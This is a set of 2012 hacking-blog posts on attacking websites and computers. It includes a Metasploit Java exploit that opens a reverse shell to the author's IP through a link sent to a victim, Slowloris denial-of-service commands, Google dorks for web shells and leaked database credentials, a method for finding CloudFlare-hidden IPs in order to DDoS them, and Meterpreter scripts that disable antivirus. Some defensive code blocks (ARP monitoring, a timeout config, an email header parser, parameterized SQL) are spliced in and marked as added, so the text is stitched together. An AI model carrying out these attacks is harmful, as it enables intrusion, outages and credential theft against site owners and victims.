We are dealing with the best educated generation in the world, but they have got brains all dressed up with nowhere to go

Wednesday, November 28, 2012

How to Hack a Targeted Website (Basic)?

Today is the age of computers and the internet. More and more people are creating their own websites to market their products and earn more profit from them. Having your own website will definitely help you get more customers purchasing your products, but at the same time you can also attract hackers to play around with your site. If you have not taken enough care to protect your site from hackers, then your business can even come to an end because of them.

Before you hack into a system, you must decide what your goals are. Are you hacking to take the system down, gain sensitive data, break into the system and take 'root' access, screw up the system by formatting everything on it, discover vulnerabilities and see how you can exploit them, etc.? The point is that you have to decide what the goal is first.
The most common goals are:
1. Breaking into the system and taking admin privileges.
2. Gaining sensitive data, such as credit cards, identity theft, etc. - not recommended

You should have all of your tools ready before you start the next steps of hacking, too. There is a Linux distribution called BackTrack. It is an operating system that comes with various security tools that will help you break into systems.
You must decide how you are going to achieve your task. Plan. There is a common methodology followed by hackers, which I will mention below. However, you can create your own methodology if you know what you are doing.
Common steps to be taken for hacking a system:
1. Reconnaissance (footprinting)
2. Scanning
3. Ports & Services Enumeration
4. Vulnerability Assessment
5. Vulnerability Exploitation
6. Penetration and Access
7. Privilege Escalation & owning the box
8. Erase tracks
9. Maintaining access

Monday, November 26, 2012

How to exploit robots.txt?

What is robots.txt?
robots.txt is a file that contains paths which must not be crawled by bots, most of the time search-engine bots like Googlebot. It tells the search engine that a directory is private and must not be crawled.
If you are a site owner and want to make a robots.txt file, then go to the following link; it will create the robots.txt file for you.
So, just for now, robots.txt is pretty much what websites use to block certain pages from search engines.
Here is a sample: http://www.whitehouse.gov/robots.txt

First method
Now this method is very rare, and the web-master would have to be stupid to do this, but you'll be surprised how many stupid people there are in the world.
This one is simple: go to one of the disallowed directories and look at the source. Sometimes web-masters leave comments there that give hints like passwords or user-names.
You never know, you might find something juicy. :]

With this info you could possibly guess his password by entering some of the most infamous/best football teams.

Sunday, November 25, 2012

How to do ARP poisoning on a network?

How to do Address Resolution Protocol (ARP) poisoning?
What does ARP mean?
Address Resolution Protocol (ARP) is a stateless protocol designed to map Internet Protocol (IP) addresses to their associated Media Access Control (MAC) addresses. This being said, by mapping a 32-bit IP address to an associated 48-bit MAC address via attached Ethernet devices, communication between local nodes can be made.
On the majority of operating systems, such as Linux, FreeBSD and other UNIX-based operating systems, and even Windows, the "arp" program is present. This program can be used to display and/or modify ARP cache entries.
An example of the "arp" utility's output looks like the following:
Windows:
> arp -a
Interface: 192.168.1.100 --- 0x10003
Internet Address Physical Address Type
192.168.1.1 00-13-10-23-9a-53 dynamic
Linux:
$ arp -na
? (192.168.1.1) at 00:90:B1C:F8:C0 [ether] on eth0
FreeBSD:
$ arp -na
? (192.168.1.1) at 00:00:0c:3e:4d:49 on bge0
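Because ARP is stateless, the cache shown above is the only record a host has of who owns which address, so a defender can catch poisoning by snapshotting it and watching for a gateway entry whose MAC suddenly changes or is shared with another host. The script below is an added example, not part of the original post: it parses the Windows and Linux/FreeBSD output formats shown above and compares a baseline snapshot against a later one (both snapshots are constructed sample text).

```python
import re
from collections import defaultdict

# One row of Windows "arp -a" (dashed MAC) or of Linux/FreeBSD "arp -na" ("? (ip) at mac ...").
WIN_ROW = re.compile(r"^\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-fA-F]{2}(?:-[0-9a-fA-F]{2}){5})\s+(\w+)")
UNIX_ROW = re.compile(r"^\?\s+\((\d+\.\d+\.\d+\.\d+)\)\s+at\s+([0-9a-fA-F]{1,2}(?::[0-9a-fA-F]{1,2}){5})")

def parse_arp(output):
    """Return {ip: mac} from the text of 'arp -a' / 'arp -na'; MACs normalised to aa:bb:cc:dd:ee:ff."""
    table = {}
    for line in output.splitlines():
        m = WIN_ROW.match(line) or UNIX_ROW.match(line)
        if not m:
            continue  # header lines such as "Interface: ..." are skipped
        ip, mac = m.group(1), m.group(2)
        mac = ":".join(part.lower().zfill(2) for part in re.split(r"[:-]", mac))
        table[ip] = mac
    return table

def find_anomalies(baseline, current):
    """Compare a known-good snapshot with a fresh one and return a list of findings."""
    findings = []
    for ip, mac in current.items():
        old = baseline.get(ip)
        if old and old != mac:
            findings.append(f"MAC changed for {ip}: {old} -> {mac}")
    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:  # one NIC answering for several IPs is the classic poisoning signature
            findings.append(f"MAC {mac} claimed by several IPs: {', '.join(sorted(ips))}")
    return findings

# Constructed sample snapshots (Windows format): gateway 192.168.1.1 and a host 192.168.1.50.
BASELINE_OUTPUT = """Interface: 192.168.1.100 --- 0x10003
  Internet Address      Physical Address      Type
  192.168.1.1           00-13-10-23-9a-53     dynamic
  192.168.1.50          00-1a-2b-3c-4d-5e     dynamic
"""
# Later snapshot: the gateway entry now carries the MAC of 192.168.1.50.
POISONED_OUTPUT = """Interface: 192.168.1.100 --- 0x10003
  Internet Address      Physical Address      Type
  192.168.1.1           00-1a-2b-3c-4d-5e     dynamic
  192.168.1.50          00-1a-2b-3c-4d-5e     dynamic
"""

if __name__ == "__main__":
    for finding in find_anomalies(parse_arp(BASELINE_OUTPUT), parse_arp(POISONED_OUTPUT)):
        print(finding)
```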

Friday, November 23, 2012

How to use the latest Java vulnerability to hack a remote PC?

Today we are going to use Metasploit again. We can hack a remote computer using a Java applet that runs code outside the sandbox. This vulnerability is new. It is applicable to Java version 7 and earlier.

(1) To use this vulnerability, first update your Metasploit modules by running the command msfupdate in your terminal
(2) Now, after the update, type msfconsole
(3) type use exploit/multi/browser/java_jre17_jaxws
(4) set payload java/shell_reverse_tcp
(5) set lhost 223.232.185.97 (your IP)
(6) set srvhost 223.232.185.97 (server IP)
(7) set uripath /
(8) exploit

Now the URL you should give to your victim is http://223.232.185.97:8080/

Now send the link to the victim. When the victim opens your link, you have access to the victim's computer.
(9) type sessions -l
(10) note the session number to connect to the session, and now type sessions -i ID

Wednesday, November 21, 2012

How to crack any hash with the help of online services?

findmyhash.py tries to crack different types of hashes using free online services.
(1) Download it from here.
(2) Open a terminal and change directory to where you downloaded the tool; if you downloaded it into the Downloads folder, then type the following command in the terminal
cd Downloads
(3) python findmyhash.py

Accepted algorithms are:
MD4, MD5, SHA1, SHA256, RMD160, LM, NTLM, MYSQL, CISCO7 & JUNIPER
NOTE: for LM / NTLM it is recommended to supply both values in this format:
python findmyhash.py LM -h 9a5760252b7455deaad3b435b51404ee:0d7f1f2bdeac6e574d6e18ca85fb58a7
python findmyhash.py NTLM -h 9a5760252b7455deaad3b435b51404ee:0d7f1f2bdeac6e574d6e18ca85fb58a7

Saturday, November 17, 2012

How to crack an MD5 hash in Ubuntu?

If you have a password as an MD5 hash and you need the password in plain text, there are lots of tools and online websites for this too, but they won't crack every MD5 hash: if your hash exists in their database they will give you the plain-text password, but if not, then you have to use some tool like the one here.
We are using a Perl script to crack a hash, so we have hashed the text "r2/." into an MD5 hash, which is "5d28a1f53e24a8b0a85d0a53348d49ad", and here we will try to recover the plain text again with Perl.

So first of all, here we already know the length of the text is 4 and that it includes special characters like ". /" etc., so our job will be easy. But if we don't know the length and what kind of characters are included in the hash, then what? No problem, we have some solution for that too. OK, let's begin with the first step. If you are using Linux (here we are using BackTrack for this), first of all you need the Perl script, so download it and follow the steps to crack a hash. I will try to explain each part of this script.

(1)Download perl script from here.

(2) Make it executable.

(3) Open a terminal and change directory to where you downloaded the script.

How to install & use SLOWLORIS in Ubuntu?

(1) Open a browser and go to this URL: http://ha.ckers.org/slowloris (here you can learn more about what Slowloris is and what it can do)
(2) Scroll down to the bottom of the page, right-click the slowloris link, choose 'save link as' and save the file to your desktop.
(3) Open a terminal and type this command: cd Desktop and hit enter. This moves the working directory to your desktop.
(4) Then type in your terminal:
sudo apt-get install perl-doc
and enter your password when prompted. This installs the Perl documentation module you'll need to see the Slowloris help page. Wait while the packages download and install.
(5) Then type this command (all on one line) and press enter:
sudo apt-get install libhtml-parser-perl libio-socket-ssl-perl
(6) When asked yes/no, type Y and press enter; this installs some libraries for Slowloris.
Again type another command, this time:
perldoc slowloris.pl
and hit enter. This will show the documentation for Slowloris. I usually type Ctrl+X, Y, Enter to save it as a record, but if you like you can just scan it and type Ctrl+X to get rid of it.
(7) Next you should type
sudo perl slowloris.pl -dns example.com -port 80 -test
hit enter and give your password if requested. This tests the server to see what its timeout window is. Wait until the test finishes; it will take several minutes. When it's done it will tell you what timeout value to use, something along the lines of 'Use 240 seconds for -timeout'.
(8) In the terminal window type
sudo perl slowloris.pl -dns example.com -port 80 -timeout 240 -num 500 -tcpto 5
This performs the actual attack; if your timeout test told you to use another timeout value, use that.
(9) In your browser window reload the target page and you should see an error message that the server is unavailable. The attack has made the target site unavailable to all users.

To stop the attack just type Ctrl+C.
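The -test step above works because the server keeps a half-sent request open until its own timeout expires. On the server side, the Apache mod_reqtimeout settings below (an added example, not part of the original post; the numbers are illustrative) cap how long a client may take to deliver its request headers, which is the behaviour Slowloris depends on.

```apache
# Added example: requires mod_reqtimeout (Apache 2.2.15+ / 2.4).
# Abort a connection whose request headers have not fully arrived within 20 seconds;
# each 500 bytes received buys one more second, up to 40 seconds in total.
# The body timeout applies the same rule to slow POST bodies.
<IfModule reqtimeout_module>
    RequestReadTimeout header=20-40,MinRate=500 body=20,MinRate=500
</IfModule>
```

After reloading Apache, a connection that trickles headers slower than the MinRate is closed with a 408 instead of holding a worker, which is what the -test run measures.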

Some cool Google Dorks

Symlink dork.
Code:
inurl:/sym/root/ & intext:"Parent Directory"

c99shell dork.
Code:
inurl:(shell.php | c99.php) Encoder Bind Proc. FTP brute Sec. SQL PHP-code Feedback Self remove Logout

c99shell dork(2).
Code:
inurl:(shell.php | c99.php) intitle:c99shell Encoder Bind Proc. FTP brute Sec. SQL PHP-code Feedback Self remove Logout

WordPress MySQL details.
Code:
inurl:(wp-config.conf | wp-config.txt) ext:(conf | txt | config)

Database usernames && passwords.
Code:
inurl:/includes/ & ext:inc & inurl:connect | inurl:dbconnect & -site:phpkode.com

Phish The Phisher
Code:
filetype:txt & intext:"email=" & intext:"pass=" & intext:"charset_test="

phpmyadmin exploit
Code:
allinurl:index.php?db=information_schema

Here is a list of other Google dorks. Download here.

Friday, November 16, 2012

How to find a person through their email address?

If you get an email from an unknown person and, before replying to the email, you want to find a little information about that person, then you need a reverse email-address lookup. Or if someone abuses you and you want to trace the person, you should use a reverse email-address lookup.
If the person has a website or has listed their account on any public website, then you can find information using a search engine. But in most cases, the person uses a fake email address for communication.

(1) If the person uses a desktop client (like Outlook, Evolution Mail, etc.) to send the email, then you can trace his IP from the email. But if he sends it from a browser, then you get the location of his email provider. For example, if a person sends an email from Gmail through a web browser, then you get the location of the Gmail server.

Open the headers of the email message and look for lines that say "Received: from" followed by an IP address in square brackets. If there are multiple entries, use the IP address mentioned in the last entry.
Now paste the IP address into this trace route tool and you should get a fairly good idea about the location of the email sender.
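The "last Received: from entry" rule above can be automated. The script below is an added example, not part of the original post: it walks the Received headers from newest to oldest, reads the bracketed IP of each hop, and skips private or loopback addresses (a webmail front end or a sender's LAN relay) so that the address returned is the last public hop. The sample message is constructed.

```python
import email
import ipaddress
import re

# IPv4 address in square brackets, e.g. "[81.2.69.142]", as seen in "Received: from host [IP]".
BRACKETED_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")

def received_ips(raw_message):
    """Bracketed IP of every 'Received:' header, top (newest hop) to bottom (oldest hop)."""
    msg = email.message_from_string(raw_message)
    ips = []
    for header in msg.get_all("Received", []):
        # Only look at the part after "from": the "by" clause names our own relay.
        m = BRACKETED_IP.search(header.split("from", 1)[-1])
        if m:
            ips.append(m.group(1))
    return ips

def originating_ip(raw_message):
    """The last 'Received: from' hop is the one closest to the sender. Private, loopback and
    link-local addresses are skipped; returns the last public hop, or None if there is none."""
    for ip in reversed(received_ips(raw_message)):
        if ipaddress.ip_address(ip).is_global:
            return ip
    return None

# Constructed sample: the sender's PC (10.0.0.5, behind NAT) handed the mail to its provider's
# SMTP server at 81.2.69.142, which relayed it to our MX at 81.2.69.1.
SAMPLE = """Received: from mx.example.net (mx.example.net [81.2.69.1])
\tby mail.example.org with ESMTP id abc123; Mon, 26 Nov 2012 10:00:00 +0000
Received: from smtp.example.net (smtp.example.net [81.2.69.142])
\tby mx.example.net with ESMTP; Mon, 26 Nov 2012 09:59:58 +0000
Received: from home-pc (unknown [10.0.0.5])
\tby smtp.example.net with esmtpa; Mon, 26 Nov 2012 09:59:55 +0000
From: someone@example.net
Subject: hello

body
"""

if __name__ == "__main__":
    print(received_ips(SAMPLE))
    print(originating_ip(SAMPLE))
```

Feeding the returned address to a geolocation or trace-route service, as the post suggests, then points at the sender's provider rather than at a NAT address that means nothing outside their network.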

Saturday, November 10, 2012

HOW TO DO SQL INJECTION FROM LINUX?

Here is an SQL injection tool for Linux: sqlmap. If you have Windows, then you should use Havij. You can find its tutorial here.

Main features are as below:
  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
  • Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

Friday, November 9, 2012

HOW TO FIND REAL I.P. PROTECTED BY CLOUD FLARE?

All these methods are based on bad admin configurations, but they are still quite common.
Use this if you want to find the real IP address of a website which is hidden by CloudFlare. It has come to my attention that many booters, hosts, malicious websites and more use CloudFlare for DDoS protection and anti-abuse-report protection. With CloudFlare protection it is difficult to get the host's IP; therefore it is difficult to send an abuse report or launch a (D)DoS attack. This simple guide will help you obtain the real IP of any website protected by CloudFlare, which can be used for whatever you desire!

METHOD 1:
If you simply ping the domain, it will give an IP which is not the website's real IP address. You should try the following options to get the real IP address of the domain:
ping direct-connect.domain.com
OR
ping direct.domain.com
OR
ping ftp.domain.com
OR
ping cpanel.domain.com
OR
ping mail.domain.com

Wednesday, November 7, 2012

How to do SQL injection manually?

According to Wikipedia, SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
You can also do it using some tools; here we are doing it without tools.
If you want to do it easily with the help of tools, then read my previous tutorial using Havij here.
Let us have a look at the contents of this tutorial.
Part One - Website Assessment
- Finding a vulnerable website
- Determining the amount of columns
- Finding which columns are vulnerable
Part Two - Gathering Information
- Determining the SQL version
- Finding the database
Part Three - The Good Part
- Finding the table names
- Finding the column names
- Displaying the column contents
- Finding the admin page
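The Wikipedia definition above says the bug is input that is "incorrectly filtered for string literal escape characters embedded in SQL statements". The added example below (not part of the original post) shows that concretely on a constructed SQLite users table: a login query built by string concatenation next to the same query with bound parameters, fed the same quote-bearing input.

```python
import sqlite3

def make_db():
    """Constructed in-memory users table standing in for the web application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])
    return conn

def login_vulnerable(conn, name, password):
    """Builds the statement by concatenation: a quote in the input ends the string literal
    and the rest of the input becomes SQL, so the WHERE clause no longer means what it says."""
    sql = ("SELECT name FROM users WHERE name = '" + name +
           "' AND password = '" + password + "' ORDER BY id")
    return [row[0] for row in conn.execute(sql)]

def login_parameterized(conn, name, password):
    """Same query with bound parameters: the driver passes the values separately from the
    statement text, so quotes in the input are compared as data and never parsed as SQL."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (name, password))]

# Constructed malicious input: closes the password literal and appends an always-true condition.
ATTACK_INPUT = "' OR '1'='1"

if __name__ == "__main__":
    conn = make_db()
    print(login_vulnerable(conn, "admin", ATTACK_INPUT))     # every user is returned
    print(login_parameterized(conn, "admin", ATTACK_INPUT))  # nobody is returned
```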

How to use WebSploit?

Hey, here is a new tool which I found: WebSploit. First download WebSploit from here.
Now install it.
The installation process is as follows.

(1) First download the WebSploit toolkit
(2) Now unzip the file
(3) Now change the permissions of the websploit file in the WebSploit folder. Right-click on the websploit file and select Properties.
(4) Select the Permissions tab, tick "Allow executing file as program" and click Close.
(5) Now open your terminal and type
    cd /Downloads/web/websploit
    ./websploit

Now open a terminal and type websploit.

Saturday, November 3, 2012

How to do DNS spoofing (tutorial)?

First, what is DNS? (wikipedia.org)
The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the internet or a private network. It associates various information with domain names assigned to each of the participants. Most importantly, it translates domain names meaningful to humans into the numerical (binary) identifiers associated with networking equipment for the purpose of locating and addressing these devices worldwide. An often used analogy to explain the Domain Name System is that it serves as the "phone book" for the Internet by translating human-friendly computer hostnames into IP addresses. For example, http://www.example.com translates to 208.77.188.166.
What does poisoning the DNS allow us to do?
It allows us to redirect the traffic to another website.
First, this is the structure of the network:

Friday, November 2, 2012

Some of the cool Metasploit Meterpreter scripts

Getcountermeasure
Getcountermeasure is an automated script that disables security measures such as antivirus, firewall and more.
Command: run getcountermeasure

Getgui
The getgui script is used to enable RDP on a target system.
Command: run getgui -e

GetTelnet
The gettelnet script is used to enable telnet on the victim.
Command: run gettelnet -e

Winenum
The winenum script is used to dump tokens and hashes.
Command: run winenum

Getlocalsubnet
The get_local_subnets script is used to get the local subnet mask of a victim.
Command: run get_local_subnets

Killav
Killav is used to disable most antivirus programs.
Command: run killav

Checkvm
Checkvm is used to see if you exploited a virtual machine.
Command: run checkvm